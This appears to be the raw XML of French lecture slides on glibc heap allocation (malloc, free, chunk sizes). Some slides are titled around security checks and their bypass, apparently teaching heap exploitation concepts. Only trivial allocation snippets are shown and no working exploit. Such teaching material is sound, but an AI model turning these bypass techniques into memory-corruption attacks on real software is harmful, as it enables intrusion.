                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E628623-336C-43F3-816D-B253C78CB2BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="24" idx="0"/>
            <a:endCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="4822511" y="3311067"/>
            <a:ext cx="432788" cy="594066"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -52820"/>
              <a:gd name="adj2" fmla="val 197791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lèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CED54AC-3B7B-4058-8D52-2F2936C784FF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2" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D37A32EB-B296-42C0-97D8-794AEDF7EE7A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23" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23397E59-DDA6-4953-957B-F7388AA23167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1" name="Flèche : chevron 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28CA5095-9D90-46B6-9AF5-1F84FE1CB7A9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2" name="Flèche : chevron 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CAACC50-1CF9-4BF7-AEA0-BCD9CC533803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43" name="Flèche : chevron 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE673EC-7D7D-46BD-8EE1-CA8A47CE6FFC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18216483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2B2387-AB3D-4A2A-BB3F-34F667637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 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>security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A1DAC4B-64B4-4BE9-97E4-9C752E71F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700808"/>
            <a:ext cx="10912880" cy="4824536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Flèche : chevron 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31A49371-C930-4FFB-9738-A3909353D1BC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Flèche : chevron 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F5359DD-439C-4AF3-8E69-073B351FEE02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7" name="Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8848238-0497-48EF-877C-687600BEE401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Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56EA276D-2B11-42D4-B1F1-96836B0AA9A4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215251F8-C213-424D-841F-7D24C88A8576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7986EA36-13B2-42D1-A38F-CB11590758A2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540312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D805B5-0A33-456D-AEB1-F046C1F4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 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>security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90E0E54-522C-40EC-9A4B-C6168DEFF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368" y="2348880"/>
            <a:ext cx="8307261" cy="21602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B7E850-448D-4A90-8CFD-EAA416A4D57A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3079787" y="4581128"/>
            <a:ext cx="6032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https://github.com/lattera/glibc/blob/master/malloc/malloc.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Flèche : chevron 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E793BA4-D1F6-4779-B64D-A4D72942D902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Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1664D040-E266-4231-8F34-FAB620094A98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8" name="Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0751A28-73B9-44B4-B706-72980B58CFBD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8D970AA5-79BC-40FD-9ACE-7144D636DEDB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471FAFA1-888C-400E-AB9A-533B819E9867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72C209EB-C34F-4DC4-A2CD-C0A04751DA4C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23845861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2B2387-AB3D-4A2A-BB3F-34F667637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 : concepts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3C637C-5FA0-43A9-ABDD-7C106D0D9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952128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>free(a)</a:t>
            </a:r>
          </a:p>
          <a:p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B76456-2910-4922-A121-298DAEED413B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5137916" y="3391706"/>
            <a:ext cx="396044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C62AFD-BE95-46E6-8A9F-EF5DA5F89C3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539839" y="3391706"/>
            <a:ext cx="1400001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70B35C-038C-458E-859C-C8B9195F68F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4741872" y="3391706"/>
            <a:ext cx="396044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C867593-D57B-4F5B-AE53-5B3821E98EC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4741178" y="4387808"/>
            <a:ext cx="2196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DF41FDC8-DD35-402C-A69D-0ED3901B39AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1775520" y="3664641"/>
            <a:ext cx="18002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F79AC11-93E8-448D-9266-92FD227B8CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1775520" y="4096689"/>
            <a:ext cx="18002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BBDF26BE-1ED7-4166-83A1-73A195F5C593}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767408" y="3664641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 : 0x10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2204379-477A-4840-A8F2-0D87C7BCED2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767408" y="4128047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: 0x20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AF8C7B7F-F588-4A2F-A56F-5E04BFCFA7F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="802904" y="4629345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BE54FD8-1AF2-4F30-B972-0C28CC7A3C8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143795" y="5031313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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Connecteur : en angle 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC95CBCA-9049-4FD4-A29A-AE5CCDEE15A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="45" idx="3"/>
            <a:endCxn id="52" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575720" y="4312713"/>
            <a:ext cx="1172031" cy="1151388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108583C8-AE71-4DB9-AAD6-B4A1F38FA584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539839" y="5031313"/>
            <a:ext cx="3876572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45ACDF5-912B-4C7D-8CAE-470DBE438178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747751" y="5031313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CACE75D2-0D15-47C8-A8A3-43B69C899EB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747751" y="6040905"/>
            <a:ext cx="46686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7" name="ZoneTexte 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13A4AB90-482A-41EA-9910-D91533B76E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5477359" y="440386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0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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881369AF-92EF-472D-99E2-ADADE46D7E2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="44" idx="3"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3575720" y="3824494"/>
            <a:ext cx="1166152" cy="56171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èche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{537ACD8A-2F15-4594-BA35-9F9C4888D6CA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" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365495E3-4BA8-4032-AC41-E47F077A9EF4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24" name="Flèche : chevron 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91AF0593-27F8-411B-9D9E-FBE7D1CD640D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6" name="Flèche : chevron 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C5CC74-A36E-4FBA-9396-F47ECEF80222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7" name="Flèche : chevron 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1B5033B-3131-4D36-9E2D-FAD3401D56FA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28" name="Flèche : chevron 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63637671-FF87-4D08-8E51-7677239BA41A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3C17CF64-9BAC-45DE-9CFF-5EBCCFE8019D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4158796" y="3272667"/>
            <a:ext cx="601412" cy="5684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8235E7B5-ACE3-48FC-BC5B-91F7BA09DFB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2387563" y="371184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old</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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671671F-AAD7-4F7F-8FF9-662E977393FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3793657" y="290333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2060668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D805B5-0A33-456D-AEB1-F046C1F4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 : bypass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B64D488-DA24-4045-90D0-05F4F880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448072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4);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512463-87D4-49DA-A05F-6A6AD5995464}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868268" y="4251908"/>
            <a:ext cx="18002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2F6A59-7BED-4457-9C90-B11EF416F5CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868268" y="4683956"/>
            <a:ext cx="18002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E0F6EB0-DAB3-42EF-9979-12CF38B6C589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1860156" y="4251908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 : 0x10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766AEAC-8F2E-471D-BD5A-3FA50D7E9562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1860156" y="4715314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: 0x20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289C43B-1E24-4A66-8FEA-2FB177529FA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1895652" y="5216612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B09696-3A45-4419-9039-6D625FFDF666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236543" y="5618580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790BBB8C-5BE8-49BC-B642-BD923E41BDBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668468" y="4899980"/>
            <a:ext cx="1172031" cy="1151388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4804359-0C9D-4303-87DF-4F08A0624E3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6632587" y="5618580"/>
            <a:ext cx="3876572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4188BB-C493-4BD0-8247-252189E75333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840499" y="5618580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C60C1E4-E095-4A68-8CDE-9369D91B77A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840499" y="6628172"/>
            <a:ext cx="46686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024C9E1-C1D6-49D7-9A05-CBAE1C77F16F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240016" y="4005064"/>
            <a:ext cx="1790153" cy="8655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F06BCF-C950-49EF-B467-A79AA609C727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5843972" y="4005064"/>
            <a:ext cx="396044" cy="8655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EF2FD76-6BD0-4DCA-8817-0CE9B0DA1FDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5833926" y="4983887"/>
            <a:ext cx="2196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D5BD3593-3F20-4F2D-A4A2-AB0D1054641C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6570107" y="499113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0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E344419-B193-48C5-B31F-1E5C38C0E1BD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" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC06CF08-2D2C-4BDD-A7E7-64FB6C57EFE6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24" name="Flèche : chevron 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95364A9F-9DDA-4A12-90A1-678E2A24085A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5" name="Flèche : chevron 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF8665E5-2B23-43BD-9192-F2826BFB06F8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6" name="Flèche : chevron 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15D1FA3B-E9A1-4A0D-A3DE-283533E1011D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27" name="Flèche : chevron 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B62637-7A48-4F61-BEEB-03463A62A9F5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1484401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D805B5-0A33-456D-AEB1-F046C1F4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 : bypass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B64D488-DA24-4045-90D0-05F4F880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799"/>
            <a:ext cx="9144000" cy="3263091"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* b = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4);</a:t>
            </a:r>
          </a:p>
          <a:p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512463-87D4-49DA-A05F-6A6AD5995464}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868268" y="4251908"/>
            <a:ext cx="18002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2F6A59-7BED-4457-9C90-B11EF416F5CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868268" y="4683956"/>
            <a:ext cx="18002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E0F6EB0-DAB3-42EF-9979-12CF38B6C589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1860156" y="4251908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 : 0x10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766AEAC-8F2E-471D-BD5A-3FA50D7E9562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1860156" y="4715314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: 0x20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289C43B-1E24-4A66-8FEA-2FB177529FA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1895652" y="5216612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B09696-3A45-4419-9039-6D625FFDF666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236543" y="5618580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790BBB8C-5BE8-49BC-B642-BD923E41BDBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668468" y="4899980"/>
            <a:ext cx="1172031" cy="1151388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4804359-0C9D-4303-87DF-4F08A0624E3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6632587" y="5618580"/>
            <a:ext cx="3876572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4188BB-C493-4BD0-8247-252189E75333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840499" y="5618580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C60C1E4-E095-4A68-8CDE-9369D91B77A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840499" y="6628172"/>
            <a:ext cx="46686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024C9E1-C1D6-49D7-9A05-CBAE1C77F16F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240016" y="4005064"/>
            <a:ext cx="1790153" cy="8655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F06BCF-C950-49EF-B467-A79AA609C727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5843972" y="4005064"/>
            <a:ext cx="396044" cy="8655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EF2FD76-6BD0-4DCA-8817-0CE9B0DA1FDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5833926" y="4983887"/>
            <a:ext cx="2196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D5BD3593-3F20-4F2D-A4A2-AB0D1054641C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6570107" y="499113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0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F2FFC03-73E7-4417-8A79-083578AC43B4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" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{532421F8-CA73-4B5D-92ED-24FF118A949F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24" name="Flèche : chevron 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C7CF69A-229F-44EA-A879-834461BE7B7A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5" name="Flèche : chevron 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0A11FBF-82D3-4D9A-8290-2B5B22E38BB5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6" name="Flèche : chevron 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F414996B-4F47-4A0B-8C7D-E02E4165A2B7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27" name="Flèche : chevron 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DDA78C9-E29E-4D7E-AA74-78DA1C533156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2891235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B45EC2-05CF-4A2A-AB0D-5F026D6C4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malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, free, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>calloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>realloc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228595-530C-4B14-B1FB-C3883F650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3040360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> size) : alloue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
